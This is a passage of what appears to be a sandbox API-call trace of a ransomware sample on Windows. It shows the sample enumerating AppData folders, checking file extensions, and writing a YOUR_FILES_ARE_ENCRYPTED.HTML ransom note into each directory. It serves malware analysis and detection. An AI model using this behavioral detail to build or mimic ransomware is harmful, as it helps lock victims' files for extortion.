param_1=0x4ebd176, param_2="%02X" | out: param_1="6D") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="AA") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="C0") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="30") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="3F") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="62") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="6C") returned 2 [0159.768] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat" [0159.768] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.768] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.771] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", cAlternateFileName="{FBC13~3.DAT")) returned 0 [0159.771] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.771] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0159.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.772] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.774] CloseHandle (hObject=0x5a8) returned 1 [0159.775] GetProcessHeap () returned 0x270000 [0159.776] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.779] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OTele", cAlternateFileName="")) returned 0 [0159.779] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.779] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0159.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.780] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.790] CloseHandle (hObject=0x4a8) returned 1 [0159.791] GetProcessHeap () returned 0x270000 [0159.792] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.797] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0159.797] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive") returned 56 [0159.797] GetProcessHeap () returned 0x270000 [0159.797] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.798] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive" [0159.798] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\*" [0159.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3df86f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="17.3.4604.0120", cAlternateFileName="173460~1.012")) returned 1 [0159.799] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120") returned 71 [0159.799] GetProcessHeap () returned 0x270000 [0159.799] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0159.801] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120" [0159.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\*" [0159.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3df86f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.802] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3df86f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.803] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="af", cAlternateFileName="")) returned 1 [0159.803] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af") returned 74 [0159.803] GetProcessHeap () returned 0x270000 [0159.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0159.804] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af" [0159.804] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\*" [0159.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.805] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa52341f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.805] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0159.805] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\FileSync.LocalizedResources.dll.mui") returned 110 [0159.805] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.805] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.805] lstrlenW (lpString=".mui") returned 4 [0159.805] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.805] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa53fd270, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa53fd270, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0159.805] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.806] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0159.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.806] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.808] CloseHandle (hObject=0x5a8) returned 1 [0159.809] GetProcessHeap () returned 0x270000 [0159.810] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="am-et", cAlternateFileName="")) returned 1 [0159.810] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et") returned 77 [0159.810] GetProcessHeap () returned 0x270000 [0159.810] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0159.810] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et" [0159.810] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\*" [0159.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.810] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa53fd270, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf4b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0159.810] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\FileSync.LocalizedResources.dll.mui") returned 113 [0159.811] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.811] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.811] lstrlenW (lpString=".mui") returned 4 [0159.811] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0159.811] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa55a0190, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa55a0190, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xf4b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0159.811] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.811] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0159.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\am-et\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.811] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.813] CloseHandle (hObject=0x5a8) returned 1 [0159.814] GetProcessHeap () returned 0x270000 [0159.815] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0159.815] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="amd64", cAlternateFileName="")) returned 1 [0159.815] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64") returned 77 [0159.815] GetProcessHeap () returned 0x270000 [0159.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0159.815] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64" [0159.815] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\*" [0159.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.818] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa55a0190, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.818] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa56d0c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa56d0c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, 